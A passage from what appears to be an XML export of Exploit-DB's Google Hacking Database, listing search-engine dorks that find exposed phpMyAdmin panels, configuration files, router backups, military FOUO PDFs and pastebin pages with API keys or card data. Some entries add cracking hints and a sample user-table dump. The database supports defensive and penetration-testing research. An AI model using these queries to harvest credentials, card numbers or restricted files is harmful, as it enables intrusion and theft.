<textualDescription>From phpmyadmin.net : &quot;phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the WWW.&quot; Great, easy to use, but lock it down! Things you can do include viewing MySQL runtime information and system variables, show processes, reloading MySQL, changing privileges, and modifying or exporting databases. Hacker-fodder for sure!</textualDescription>
<query>inurl:main.php phpMyAdmin</query>
<querystring>https://www.google.com/search?safe=off&amp;q=inurl%3Amain.php+phpMyAdmin</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>100</id>
<link>https://www.exploit-db.com/ghdb/100</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:main.php Welcome to phpMyAdmin</shortDescription>
<textualDescription>From phpmyadmin.net : &quot;phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the WWW.&quot; Great, easy to use, but lock it down! Things you can do include viewing MySQL runtime information and system variables, show processes, reloading MySQL, changing privileges, and modifying or exporting databases. Hacker-fodder for sure!</textualDescription>
<query>inurl:main.php Welcome to phpMyAdmin</query>
<querystring>https://www.google.com/search?safe=off&amp;q=inurl%3Amain.php+Welcome+to+phpMyAdmin</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>4354</id>
<link>https://www.exploit-db.com/ghdb/4354</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:ManageFilters.jspa?filterView=popular</shortDescription>
<textualDescription>*Summary:*
A Google dork that gives popular JIRA issue topics, related JIRA usernames
and JIRA queries.
*Dork discovered by:*
Cenk Kalpakoglu
Goktug Serez
https://endpoint-labs.com</textualDescription>
<query>inurl:ManageFilters.jspa?filterView=popular</query>
<querystring>https://www.google.com/search?q=inurl:ManageFilters.jspa?filterView=popular</querystring>
<edb></edb>
<date>2016-11-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>3922</id>
<link>https://www.exploit-db.com/ghdb/3922</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:mikrotik filetype:backup</shortDescription>
<textualDescription>mikrotik url backups uploaded..
then.. credentials cracked via http://mikrotikpasswordrecovery.com
Best Regards,
kn0wl13dg3 - underc0de team.- www.underc0de.org
kn0w13dg3.blogspot.com</textualDescription>
<query>inurl:mikrotik filetype:backup</query>
<querystring>https://www.google.com/search?q=inurl:mikrotik filetype:backup</querystring>
<edb></edb>
<date>2013-11-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>7383</id>
<link>https://www.exploit-db.com/ghdb/7383</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:mil intext:&quot;UNCLASSIFIED/FOUO&quot; ext:pdf</shortDescription>
<textualDescription># Google Dork: inurl:mil intext:&quot;UNCLASSIFIED/FOUO&quot; ext:pdf
# Files Containing Juicy Info
# Date: 03/10/2021
# Exploit Author: Stuart Steenberg</textualDescription>
<query>inurl:mil intext:&quot;UNCLASSIFIED/FOUO&quot; ext:pdf</query>
<querystring>https://www.google.com/search?q=inurl:mil intext:&quot;UNCLASSIFIED/FOUO&quot; ext:pdf</querystring>
<edb></edb>
<date>2021-10-04</date>
<author>Stuart Steenberg</author>
</entry>
<entry>
<id>4667</id>
<link>https://www.exploit-db.com/ghdb/4667</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:module=coreHome</shortDescription>
<textualDescription>Piwik web analytics shows statistics for web servers including who is
visiting the site, what pages they visit, number of hits, referrers, and
more.
-batgab
</textualDescription>
<query>inurl:module=coreHome</query>
<querystring>https://www.google.com/search?q=inurl:module=coreHome</querystring>
<edb></edb>
<date>2018-02-08</date>
<author>batgab</author>
</entry>
<entry>
<id>847</id>
<link>https://www.exploit-db.com/ghdb/847</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:netscape.hst</shortDescription>
<textualDescription>Netscape Bookmark List/History: So an attacker would be able to locate the bookmark and history list</textualDescription>
<query>inurl:netscape.hst</query>
<querystring>https://www.google.com/search?q=inurl%3Anetscape.hst+</querystring>
<edb></edb>
<date>2005-01-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>849</id>
<link>https://www.exploit-db.com/ghdb/849</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:netscape.hst</shortDescription>
<textualDescription>History for Netscape - So an attacker can read a user's browsing history.</textualDescription>
<query>inurl:netscape.hst</query>
<querystring>https://www.google.com/search?q=inurl%3Anetscape.hst+</querystring>
<edb></edb>
<date>2005-01-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>846</id>
<link>https://www.exploit-db.com/ghdb/846</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:netscape.ini</shortDescription>
<textualDescription>There's a bunch of interesting info in netscape.ini1. Viewers: which multimedia viewers the firm or people are using2.Cookies3.Address Book4.Mail- If pop3 is used you will see login and password. 5.Java - will tell the attacker if his victim has Java enabled.6.URL History - The last sites visitedURL_1=http://edtech.xxxx.fi/URL_2=C:\Tx\ixxx_t3.htmURL_3=http://www.xxx.com/welcome/URL_4=http://xxx.netscape.com7.User Trusted External Applications</textualDescription>
<query>inurl:netscape.ini</query>
<querystring>https://www.google.com/search?q=inurl%3Anetscape.ini+&amp;sourceid=mozilla-search&amp;start=0&amp;start=0&amp;ie=utf-8&amp;oe=utf-8&amp;rls=org.mozilla:en-US:official</querystring>
<edb></edb>
<date>2005-01-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>3823</id>
<link>https://www.exploit-db.com/ghdb/3823</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:newsnab/www/ automated.config.php</shortDescription>
<textualDescription>Usenet Accounts from Newsnab configs
inurl:newsnab/www/ automated.config.php
Author: rmccurdy.com
yay free newsgroup access !
***********************************************************************
The information in this email is confidential and may be legally privileged. It is intended solely for the addressee. Access to this email by anyone else is unauthorized. If you are not the intended recipient, any disclosure, copying, distribution or any action taken or omitted to be taken in reliance on it, is prohibited and may be unlawful. When addressed to our clients any opinions or advice contained in this email are subject to the terms and conditions expressed in the governing KPMG client engagement letter.
***********************************************************************
</textualDescription>
<query>inurl:newsnab/www/ automated.config.php</query>
<querystring>https://www.google.com/search?q=Google dork inurl:newsnab/www/ automated.config.php</querystring>
<edb></edb>
<date>2012-12-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>4904</id>
<link>https://www.exploit-db.com/ghdb/4904</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:nginx.conf nginx site:github.com</shortDescription>
<textualDescription>This dork can be used to detect codes hosted by different companies that
uses NGINX Web Server.
Mufeed VH
</textualDescription>
<query>inurl:nginx.conf nginx site:github.com</query>
<querystring>https://www.google.com/search?q=inurl:nginx.conf nginx site:github.com</querystring>
<edb></edb>
<date>2018-08-07</date>
<author>Mufeed VH</author>
</entry>
<entry>
<id>7776</id>
<link>https://www.exploit-db.com/ghdb/7776</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:node_modules/ua-parser-js</shortDescription>
<textualDescription># Google Dork: inurl:node_modules/ua-parser-js
# Files Containing Juicy Info
# Date:11/11/2021
# Exploit Author: Javier Bernardo</textualDescription>
<query>inurl:node_modules/ua-parser-js</query>
<querystring>https://www.google.com/search?q=inurl:node_modules/ua-parser-js</querystring>
<edb></edb>
<date>2021-11-11</date>
<author>Javier Bernardo</author>
</entry>
<entry>
<id>536</id>
<link>https://www.exploit-db.com/ghdb/536</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:odbc.ini ext:ini -cvs</shortDescription>
<textualDescription>This search will show the googler ODBC client configuration files which may contain usernames/databases/ipaddresses and whatever.</textualDescription>
<query>inurl:odbc.ini ext:ini -cvs</query>
<querystring>https://www.google.com/search?q=inurl%3Aodbc.ini+ext%3Aini+-cvs</querystring>
<edb></edb>
<date>2004-10-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>5247</id>
<link>https://www.exploit-db.com/ghdb/5247</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:old &quot;index of&quot; &quot;wp-config.php&quot;</shortDescription>
<textualDescription>Finds wp-config files on old defunct WordPress installations
</textualDescription>
<query>inurl:old &quot;index of&quot; &quot;wp-config.php&quot;</query>
<querystring>https://www.google.com/search?q=inurl:old &quot;index of&quot; &quot;wp-config.php&quot;</querystring>
<edb></edb>
<date>2019-06-05</date>
<author>Chris Rogers</author>
</entry>
<entry>
<id>7753</id>
<link>https://www.exploit-db.com/ghdb/7753</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:pastebin &quot;API_KEY&quot;</shortDescription>
<textualDescription># Google Dork: inurl:pastebin &quot;API_KEY&quot;
# Files Containing Juicy Info
# Date:10/11/2021
# Exploit Author: Krishna Agarwal</textualDescription>
<query>inurl:pastebin &quot;API_KEY&quot;</query>
<querystring>https://www.google.com/search?q=inurl:pastebin &quot;API_KEY&quot;</querystring>
<edb></edb>
<date>2021-11-10</date>
<author>Krishna Agarwal</author>
</entry>
<entry>
<id>7700</id>
<link>https://www.exploit-db.com/ghdb/7700</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:pastebin &quot;AWS_ACCESS_KEY&quot;</shortDescription>
<textualDescription># Google Dork: inurl:pastebin &quot;AWS_ACCESS_KEY&quot;
# Files Containing Juicy Info
# Date:8/11/2021
# Exploit Author: Nithissh S</textualDescription>
<query>inurl:pastebin &quot;AWS_ACCESS_KEY&quot;</query>
<querystring>https://www.google.com/search?q=inurl:pastebin &quot;AWS_ACCESS_KEY&quot;</querystring>
<edb></edb>
<date>2021-11-09</date>
<author>Nithissh S</author>
</entry>
<entry>
<id>7732</id>
<link>https://www.exploit-db.com/ghdb/7732</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:pastebin &quot;CVV&quot;</shortDescription>
<textualDescription># Google Dork: inurl:pastebin &quot;CVV&quot;
# Files Containing Juicy Info
# Date:9/11/2021
# Exploit Author: Ritika Keni</textualDescription>
<query>inurl:pastebin &quot;CVV&quot;</query>
<querystring>https://www.google.com/search?q=inurl:pastebin &quot;CVV&quot;</querystring>
<edb></edb>
<date>2021-11-10</date>
<author>Ritika Keni</author>
</entry>
<entry>
<id>7725</id>
<link>https://www.exploit-db.com/ghdb/7725</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:pastebin &quot;SHODAN_API_KEY&quot;</shortDescription>
<textualDescription># Google Dork:inurl:pastebin &quot;SHODAN_API_KEY&quot;
# Files Containing Juicy Info
# Date: 09/11/2021
# Exploit Author: Nithissh S</textualDescription>
<query>inurl:pastebin &quot;SHODAN_API_KEY&quot;</query>
<querystring>https://www.google.com/search?q=inurl:pastebin &quot;SHODAN_API_KEY&quot;</querystring>
<edb></edb>
<date>2021-11-10</date>
<author>Nithissh S</author>
</entry>
<entry>
<id>7796</id>
<link>https://www.exploit-db.com/ghdb/7796</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:pastebin &quot;SHODAN_API_KEY&quot;</shortDescription>
<textualDescription># Google Dork: inurl:pastebin &quot;SHODAN_API_KEY&quot;
# Files Containing Juicy Info
# Date:13/11/2021
# Exploit Author: Vrushabh Kadam</textualDescription>
<query>inurl:pastebin &quot;SHODAN_API_KEY&quot;</query>
<querystring>https://www.google.com/search?q=inurl:pastebin &quot;SHODAN_API_KEY&quot;</querystring>
<edb></edb>
<date>2021-11-15</date>
<author>Vrushabh Kadam</author>
</entry>
<entry>
<id>8339</id>
<link>https://www.exploit-db.com/ghdb/8339</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:pastebin &quot;VISA&quot;</shortDescription>
<textualDescription># Google Dork: inurl:pastebin &quot;VISA&quot;
# Files Containing Juicy Info
# Date: 10/11/2023
# Exploit: Abhishek Patel</textualDescription>
<query>inurl:pastebin &quot;VISA&quot;</query>
<querystring>https://www.google.com/search?q=inurl:pastebin &quot;VISA&quot;</querystring>
<edb></edb>
<date>2023-11-10</date>
<author>Abhishek Patel</author>
</entry>
<entry>
<id>7754</id>
<link>https://www.exploit-db.com/ghdb/7754</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:pastebin &quot;Windows 10 Product Keys*&quot;</shortDescription>
<textualDescription># Google Dork: inurl:pastebin &quot;Windows 10 Product Keys*&quot;
# Files Containing Juicy Info
# Date:10/11/2021
# Exploit Author: Krishna Agarwal</textualDescription>
<query>inurl:pastebin &quot;Windows 10 Product Keys*&quot;</query>
<querystring>https://www.google.com/search?q=inurl:pastebin &quot;Windows 10 Product Keys*&quot;</querystring>
<edb></edb>
<date>2021-11-10</date>
<author>Krishna Agarwal</author>
</entry>
<entry>
<id>186</id>
<link>https://www.exploit-db.com/ghdb/186</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:perl/printenv</shortDescription>
<textualDescription>This is the print environemnts script which lists sensitive information such as path names, server names, port numbers, server software and version numbers, administrator email addresses and more.</textualDescription>
<query>inurl:perl/printenv</query>
<querystring>https://www.google.com/search?q=inurl%3Aperl%2Fprintenv</querystring>
<edb></edb>
<date>2004-04-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>241</id>
<link>https://www.exploit-db.com/ghdb/241</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:php.ini filetype:ini</shortDescription>
<textualDescription>The php.ini file contains all the configuration for how PHP is parsed on a server. It can contain default database usernames, passwords, hostnames, IP addresses, ports, initialization of global variables and other information. Since it is found by default in /etc, you might be able to find a lot more unrelated information in the same directory.</textualDescription>
<query>inurl:php.ini filetype:ini</query>
<querystring>https://www.google.com/search?q=inurl%3Aphp.ini+filetype%3Aini</querystring>
<edb></edb>
<date>2004-05-17</date>
<author>anonymous</author>
</entry>
<entry>
<id>8226</id>
<link>https://www.exploit-db.com/ghdb/8226</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:php?id=1 site:com</shortDescription>
<textualDescription>Google Dork: inurl:php?id=1 site:com
# Files Containing Juicy Info
# Date: 11/09/2023
# Exploit Akshad Joshi</textualDescription>
<query>inurl:php?id=1 site:com</query>
<querystring>https://www.google.com/search?q=inurl:php?id=1 site:com</querystring>
<edb></edb>
<date>2023-09-11</date>
<author>Akshad Joshi</author>
</entry>
<entry>
<id>3641</id>
<link>https://www.exploit-db.com/ghdb/3641</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:phpinfo.php</shortDescription>
<textualDescription>Locates phpinfo files. A phpinfo file Outputs a large amount of information about the current state of PHP. This includes information about PHP compilation options and extensions, the PHP version, server information and environment , the PHP environment, OS version information, paths, master and local values of configuration options, HTTP headers, and the PHP License. Author: ScOrPiOn</textualDescription>
<query>inurl:phpinfo.php</query>
<querystring>https://www.google.com/search?q=inurl:phpinfo.php</querystring>
<edb></edb>
<date>2010-12-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>6997</id>
<link>https://www.exploit-db.com/ghdb/6997</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:phpmyadmin/sql.php?server=1</shortDescription>
<textualDescription>Files Containing Juicy info:
inurl:phpmyadmin/sql.php?server=1
BR,
Reza Abasi (Turku)
Cyber Sec researcher
</textualDescription>
<query>inurl:phpmyadmin/sql.php?server=1</query>
<querystring>https://www.google.com/search?q=inurl:phpmyadmin/sql.php?server=1</querystring>
<edb></edb>
<date>2021-06-09</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5137</id>
<link>https://www.exploit-db.com/ghdb/5137</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:pipermail filetype:txt</shortDescription>
<textualDescription>file containing emails..
Regards
Hussain Vohra
</textualDescription>
<query>inurl:pipermail filetype:txt</query>
<querystring>https://www.google.com/search?q=inurl:pipermail filetype:txt</querystring>
<edb></edb>
<date>2019-03-01</date>
<author>Hussain Vohra</author>
</entry>
<entry>
<id>785</id>
<link>https://www.exploit-db.com/ghdb/785</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:preferences.ini &quot;[emule]&quot;</shortDescription>
<textualDescription>This finds the emule configuration file which contains some general and proxy information.Sometimes proxy user and password are stored.</textualDescription>
<query>inurl:preferences.ini &quot;[emule]&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3Apreferences.ini+%22%5Bemule%5D%22</querystring>
<edb></edb>
<date>2004-12-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>378</id>
<link>https://www.exploit-db.com/ghdb/378</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:profiles filetype:mdb</shortDescription>
<textualDescription>Microsoft Access databases containing (user) profiles ..</textualDescription>
<query>inurl:profiles filetype:mdb</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=inurl%3Aprofiles+filetype%3Amdb</querystring>
<edb></edb>
<date>2004-07-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>699</id>
<link>https://www.exploit-db.com/ghdb/699</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:report &quot;EVEREST Home Edition &quot;</shortDescription>
<textualDescription>Well what can be said about this one, I've added it to the DB under Juicy info, however it could have easilly gone under virtually any of the lists as it just give out Soooo much info. I can for instance find out the admin username (not just the adin every user) and also if it password protected and if the password ever expires plus is it a current user account, also do the same for any guest accounts, Ok nice and easy how about the O/S and all the Mapped Drive locations all there along with installed software and even currently running applications and processes. Site admins would have to be mad to leave this stuff open, but as we all know from the GHDB Site admins do weird and funny stuff. This one just gives out to much to list, so go have a look and see what you can find.</textualDescription>
<query>inurl:report &quot;EVEREST Home Edition &quot;</query>
<querystring>https://www.google.com/search?q=inurl%3Areport+%22EVEREST+Home+Edition+%22&amp;safe=off</querystring>
<edb></edb>
<date>2004-11-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>8107</id>
<link>https://www.exploit-db.com/ghdb/8107</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:robots filetype:txt</shortDescription>
<textualDescription># Google Dork: inurl:robots filetype:txt
# Files Containing Juicy Info
# Date:13/03/2023
# Exploit Author: Konaté Olivier</textualDescription>
<query>inurl:robots filetype:txt</query>
<querystring>https://www.google.com/search?q=inurl:robots filetype:txt</querystring>
<edb></edb>
<date>2023-03-13</date>
<author>Konaté Olivier</author>
</entry>
<entry>
<id>4960</id>
<link>https://www.exploit-db.com/ghdb/4960</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:robots.txt intext:Disallow: /web.config</shortDescription>
<textualDescription># Google Dork: inurl:robots.txt intext:Disallow: /web.config
# Description: Google Dork to find /web.config file in robots.txt
# Date: 2018-09-21
# Author: Miguel Santareno
# Contact: https://www.linkedin.com/in/miguelsantareno/
</textualDescription>
<query>inurl:robots.txt intext:Disallow: /web.config</query>
<querystring>https://www.google.com/search?q=inurl:robots.txt intext:Disallow: /web.config</querystring>
<edb></edb>
<date>2018-09-21</date>
<author>Miguel Santareno</author>
</entry>
<entry>
<id>5342</id>
<link>https://www.exploit-db.com/ghdb/5342</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:robots.txt site:gov + intext:password</shortDescription>
<textualDescription>I have discovered a google dork which can be used to find all the URL's
having robots.txt in it. As a filter, It will only show those websites
which are related to the government and having content related to username
and passwords in those files.
DORK : inurl:robots.txt site:gov + intext:password
</textualDescription>
<query>inurl:robots.txt site:gov + intext:password</query>
<querystring>https://www.google.com/search?q=inurl:robots.txt site:gov + intext:password</querystring>
<edb></edb>
<date>2019-08-12</date>
<author>Vaibhav Pareek</author>
</entry>
<entry>
<id>7967</id>
<link>https://www.exploit-db.com/ghdb/7967</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:s3.amazonaws.com intitle:&quot;AWS S3 Explorer&quot;</shortDescription>
<textualDescription># Google Dork: inurl:s3.amazonaws.com intitle:&quot;AWS S3 Explorer&quot;
# Files Containing Juicy Info
# Date: 15/07/2022
# Exploit Author: César Hernández Obispo
</textualDescription>
<query>inurl:s3.amazonaws.com intitle:&quot;AWS S3 Explorer&quot;</query>
<querystring>https://www.google.com/search?q=inurl:s3.amazonaws.com intitle:&quot;AWS S3 Explorer&quot;</querystring>
<edb></edb>
<date>2022-07-15</date>
<author>César Hernández Obispo</author>
</entry>
<entry>
<id>7351</id>
<link>https://www.exploit-db.com/ghdb/7351</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:sap/public/bc</shortDescription>
<textualDescription># Google Dork: inurl:sap/public/bc
# Files Containing Juicy Info
# Date:28/09/2021
# Exploit Author: Javier Bernardo</textualDescription>
<query>inurl:sap/public/bc</query>
<querystring>https://www.google.com/search?q=inurl:sap/public/bc</querystring>
<edb></edb>
<date>2021-09-30</date>
<author>Javier Bernardo</author>
</entry>
<entry>
<id>3721</id>
<link>https://www.exploit-db.com/ghdb/3721</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:sarg inurl:siteuser.html</shortDescription>
<textualDescription>Submitter: pipefish
Squid User Access Reports that show users' browsing history through
the proxy. Shows internal IP space sometimes, usernames as well, and can
be helpful when planning a pen test (spear phishing\social engineering
campaign etc.) It also helps to ID an organization's proxy server.</textualDescription>
<query>inurl:sarg inurl:siteuser.html</query>
<querystring>https://www.google.com/search?q=inurl:sarg inurl:siteuser.html</querystring>
<edb></edb>
<date>2011-05-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>5106</id>
<link>https://www.exploit-db.com/ghdb/5106</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:scanned &amp; documents intitle:&quot;index of&quot; IT</shortDescription>
<textualDescription>Juicy info, good for OSINT.
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>inurl:scanned &amp; documents intitle:&quot;index of&quot; IT</query>
<querystring>https://www.google.com/search?q=inurl:scanned &amp; documents intitle:&quot;index of&quot; IT</querystring>
<edb></edb>
<date>2019-02-15</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>4580</id>
<link>https://www.exploit-db.com/ghdb/4580</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:scan_result_file</shortDescription>
<textualDescription>Will produce a list of sites that have clamAV results, which could list
potential backdoors installed that an attacker can use to gain access to a
site.
--
Colette Chamberland
CISSP, C|EH, C|HFI</textualDescription>
<query>inurl:scan_result_file</query>
<querystring>https://www.google.com/search?q=inurl:scan_result_file</querystring>
<edb></edb>
<date>2017-09-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>189</id>
<link>https://www.exploit-db.com/ghdb/189</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:server-info &quot;Apache Server Information&quot;</shortDescription>
<textualDescription>This is the Apache server-info program. There is so much sensitive stuff listed on this page that it's hard to list it all here. Some informatino listed here includes server version and build, software versions, hostnames, ports, path info, modules installed, module info, configuration data and so much more....</textualDescription>
<query>inurl:server-info &quot;Apache Server Information&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3Aserver-info+%22Apache+Server+Information%22</querystring>
<edb></edb>
<date>2004-04-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>3733</id>
<link>https://www.exploit-db.com/ghdb/3733</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:server-info intitle:&quot;Server Information&quot; Apache Server Information</shortDescription>
<textualDescription>Juicy information about the apache server installation in the website.
--
*Regards,
Fady Mohammed Osman.*</textualDescription>
<query>inurl:server-info intitle:&quot;Server Information&quot; Apache Server Information</query>
<querystring>https://www.google.com/search?q=inurl:server-info intitle:&quot;Server Information&quot; Apache Server Information</querystring>
<edb></edb>
<date>2011-07-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>179</id>
<link>https://www.exploit-db.com/ghdb/179</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:server-status &quot;apache&quot;</shortDescription>
<textualDescription>This page shows all sort of information about the Apache web server. It can be used to track process information, directory maps, connection data, etc.</textualDescription>
<query>inurl:server-status &quot;apache&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3Aserver%2Dstatus+%22apache%22</querystring>
<edb></edb>
<date>2004-04-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>8346</id>
<link>https://www.exploit-db.com/ghdb/8346</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:signup | inurl:sign-up | inurl:register | inurl:registration</shortDescription>
<textualDescription># Google Dork: inurl:signup | inurl:sign-up | inurl:register | inurl:registration
# Files Containing Juicy Info
# Date: 17/11/2023
# Exploit: Qais Qais</textualDescription>
<query>inurl:signup | inurl:sign-up | inurl:register | inurl:registration</query>
<querystring>https://www.google.com/search?q=inurl:signup | inurl:sign-up | inurl:register | inurl:registration</querystring>
<edb></edb>
<date>2023-11-17</date>
<author>Qais Qais</author>
</entry>
<entry>
<id>7395</id>
<link>https://www.exploit-db.com/ghdb/7395</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:simplesaml/saml2/idp</shortDescription>
<textualDescription># Google Dork: inurl:simplesaml/saml2/idp
# Files Containing Juicy Info
# Date: 04/10/2021
# Exploit Author: Javier Bernardo</textualDescription>
<query>inurl:simplesaml/saml2/idp</query>
<querystring>https://www.google.com/search?q=inurl:simplesaml/saml2/idp</querystring>
<edb></edb>
<date>2021-10-05</date>
<author>Javier Bernardo</author>
</entry>
<entry>
<id>462</id>
<link>https://www.exploit-db.com/ghdb/462</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:snitz_forums_2000.mdb</shortDescription>
<textualDescription>The SnitzTM Forums 2000 Version 3.4.04 Installation Guide and Readme says: &quot;it is strongly recommended that you change the default database name from snitz_forums_2000.mdb to a cryptic or not easy to guess name.&quot;Of course, we know readme's are for lamers.. right admins ?[murfie@forofo googledorks]$ mdb-export snitz_forums_2000.mdb FORUM_MEMBERSMEMBER_ID,M_STATUS,M_NAME,M_USERNAME,M_PASSWORD,M_EMAIL, [etc]1,1,&quot;adminadmin&quot;,&quot;58180bb12beb55a4bffbxxde75cxxc53dcc8061c3cdee52e0ebdcd74049d374e&quot;,&quot;yourmail@server.com&quot;,&quot; &quot;,&quot; &quot;,&quot;&quot;,&quot;&quot;,1,1,1,3,&quot; &quot;,&quot; &quot;,&quot; &quot;,&quot;20030918120147&quot;,2,&quot;20030918120207&quot;,&quot;20030918120224&quot;,&quot;Forum Admin&quot;,&quot;10.xx.xx.72&quot;,0,0,1,&quot;000.000.000.000&quot;,&quot;&quot;,&quot;&quot;,&quot;&quot;,&quot;&quot;,&quot;&quot;,&quot;&quot;,&quot;&quot;,&quot;&quot;,&quot;&quot;,&quot;&quot;,&quot;&quot;,&quot; &quot;,&quot; &quot;,&quot;&quot;,&quot;&quot;,&quot; &quot;,&quot;&quot;,&quot;&quot;,&quot;&quot;,&quot;&quot;,1(data xx'd at some points) The password hash value is a SHA256 encoded string (with no salting). Every attacker knows they can be broken with a dictionary attack using a very simpel perl or C program.http://murfnet.xs4all.nl/public/scripts/perl/desnitz.txt</textualDescription>
<query>inurl:snitz_forums_2000.mdb</query>
<querystring>https://www.google.com/search?q=inurl%3Asnitz_forums_2000.mdb</querystring>
<edb></edb>
<date>2004-09-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>4064</id>
<link>https://www.exploit-db.com/ghdb/4064</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:src/viewcvs.cgi/log/.c?=</shortDescription>
<textualDescription>Vulnerable CVS logs</textualDescription>
<query>inurl:src/viewcvs.cgi/log/.c?=</query>
<querystring>https://www.google.com/search?q=inurl:src/viewcvs.cgi/log/.c?=</querystring>
<edb></edb>
<date>2015-08-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>8117</id>
<link>https://www.exploit-db.com/ghdb/8117</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:ssh intitle:index of /files</shortDescription>
<textualDescription># Google Dork: inurl:ssh intitle:index of /files
# Files Containing Juicy Info
# Date:16/03/2023
# Exploit Author: PRINCY M JOSE</textualDescription>
<query>inurl:ssh intitle:index of /files</query>
<querystring>https://www.google.com/search?q=inurl:ssh intitle:index of /files</querystring>
<edb></edb>
<date>2023-03-16</date>
<author>PRINCY M JOSE</author>
</entry>
<entry>
<id>330</id>
<link>https://www.exploit-db.com/ghdb/330</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:ssl.conf filetype:conf</shortDescription>
<textualDescription>The information contained in these files depends on the actual file itself. SSL.conf files contain port numbers, ssl data, full path names, logging information, location of authentication files, and more. Other conf files based on this name may contain similar information. Attackers can use this information against a target in various ways.</textualDescription>
<query>inurl:ssl.conf filetype:conf</query>
<querystring>https://www.google.com/search?q=inurl%3Assl%2Econf+filetype%3Aconf</querystring>
<edb></edb>
<date>2004-07-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3915</id>
<link>https://www.exploit-db.com/ghdb/3915</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:tar filetype:gz</shortDescription>
<textualDescription>Tar files
Contain user and group information (in addition to potentially useful files)
--
-[Voluntas Vincit Omnia]-
website http://www.erisresearch.org/
Google+ https://plus.google.com/u/0/114827336297709201563</textualDescription>
<query>inurl:tar filetype:gz</query>
<querystring>https://www.google.com/search?q=inurl:tar filetype:gz</querystring>
<edb></edb>
<date>2013-11-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>196</id>
<link>https://www.exploit-db.com/ghdb/196</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:tdbin</shortDescription>
<textualDescription>This is the default directory for TestDirector (http://www.mercuryinteractive.com/products/testdirector/). This program contains sensitive information including software defect data which should not be publically accessible.</textualDescription>
<query>inurl:tdbin</query>
<querystring>https://www.google.com/search?q=inurl%3Atdbin</querystring>
<edb></edb>
<date>2004-05-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>4903</id>
<link>https://www.exploit-db.com/ghdb/4903</link>
<category>Files Containing Juicy Info</category>
<shortDescription>inurl:travis.yml tornado site:github.com</shortDescription>
<textualDescription>This can be used to identify the code hosted by different companies that
use Tornado Web Server.
Thanks,
Mufeed VH
